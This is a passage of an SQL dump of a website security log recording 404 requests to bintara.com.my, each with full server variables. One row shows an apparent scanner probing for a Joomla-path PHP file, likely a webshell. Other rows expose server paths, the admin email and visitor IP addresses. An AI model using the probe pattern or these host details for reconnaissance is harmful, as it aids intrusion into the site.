\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpnFCC9qkCozCNGajGgTQAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569351444.9739\";s:12:\"REQUEST_TIME\";s:10:\"1569351444\";}}','notice','2019-09-24 18:57:27','2019-09-24 18:57:25',30782704,32599800,'https://bintara.com.my/libraries/joomla/template/mide.php',1,0,'212.48.89.54'),(26923,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/libraries/joomla/template/mide.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"212.48.89.54\";s:11:\"REMOTE_PORT\";s:5:\"34948\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/libraries/joomla/template/mide.php\";s:10:\"SCRIPT_URL\";s:35:\"/libraries/joomla/template/mide.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpnEXlb-cYDmeWuuufKuQAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569351441.5009\";s:12:\"REQUEST_TIME\";s:10:\"1569351441\";}}','notice','2019-09-24 18:57:24','2019-09-24 18:57:21',31175704,32981816,'https://bintara.com.my/libraries/joomla/template/mide.php',1,0,'212.48.89.54'),(26922,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ads.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:39:\"Mozilla/5.0 (compatible; evc-batch/2.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ads.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpk0xaIaq52cc-9XMJ7LwAAAAQ\";s:12:\"REDIRECT_URL\";s:8:\"/ads.txt\";s:11:\"REMOTE_ADDR\";s:11:\"38.99.62.94\";s:11:\"REMOTE_PORT\";s:5:\"60550\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:10:\"SCRIPT_URL\";s:8:\"/ads.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpk0xaIaq52cc-9XMJ7LwAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569350867.7673\";s:12:\"REQUEST_TIME\";s:10:\"1569350867\";}}','notice','2019-09-24 18:47:50','2019-09-24 18:47:48',31145568,32949472,'https://bintara.com.my/ads.txt',1,0,'38.99.62.94'),(26921,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"186.200.68.34\";s:11:\"REMOTE_PORT\";s:5:\"39237\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYphERaIaq52cc-9XMJ54AAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569349905.9901\";s:12:\"REQUEST_TIME\";s:10:\"1569349905\";}}','notice','2019-09-24 18:31:47','2019-09-24 18:31:46',30813248,32630472,'https://bintara.com.my/?page_id=18',1,0,'186.200.68.34'),(26919,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpZSxaIaq52cc-9XMJ2-AAAAAM\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"49275\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpZSxaIaq52cc-9XMJ2-AAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569347915.1894\";s:12:\"REQUEST_TIME\";s:10:\"1569347915\";}}','notice','2019-09-24 17:58:39','2019-09-24 17:58:35',31317320,33116624,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26920,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"50718\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpcRCC9qkCozCNGajGeYwAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569348676.5781\";s:12:\"REQUEST_TIME\";s:10:\"1569348676\";}}','notice','2019-09-24 18:11:19','2019-09-24 18:11:16',31208264,33022376,'https://bintara.com.my/?page_id=11',1,0,'223.206.242.226'),(26867,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.237.23.73\";s:11:\"REMOTE_PORT\";s:5:\"41314\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYimtsFqgMX-PLsgt8dMigAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569236662.2837\";s:12:\"REQUEST_TIME\";s:10:\"1569236662\";}}','notice','2019-09-23 11:04:29','2019-09-23 11:04:23',31214184,33029816,'https://bintara.com.my/?page_id=18',1,0,'23.237.23.73'),(26866,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.113.107.11\";s:11:\"REMOTE_PORT\";s:5:\"46202\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYilJ7BAWOqnjv6og71fVgAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569236264.0132\";s:12:\"REQUEST_TIME\";s:10:\"1569236264\";}}','notice','2019-09-23 10:57:45','2019-09-23 10:57:44',30811832,32626544,'https://bintara.com.my/?page_id=18',1,0,'45.113.107.11'),(26864,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"78.154.161.132\";s:11:\"REMOTE_PORT\";s:5:\"61761\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYiQ@Lp66oO1SlzUVT6vhQAAAdI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569231097.1356\";s:12:\"REQUEST_TIME\";s:10:\"1569231097\";}}','notice','2019-09-23 09:31:40','2019-09-23 09:31:37',31203000,33011696,'https://bintara.com.my/?page_id=18/contact.php',1,0,'78.154.161.132'),(26865,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:105:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 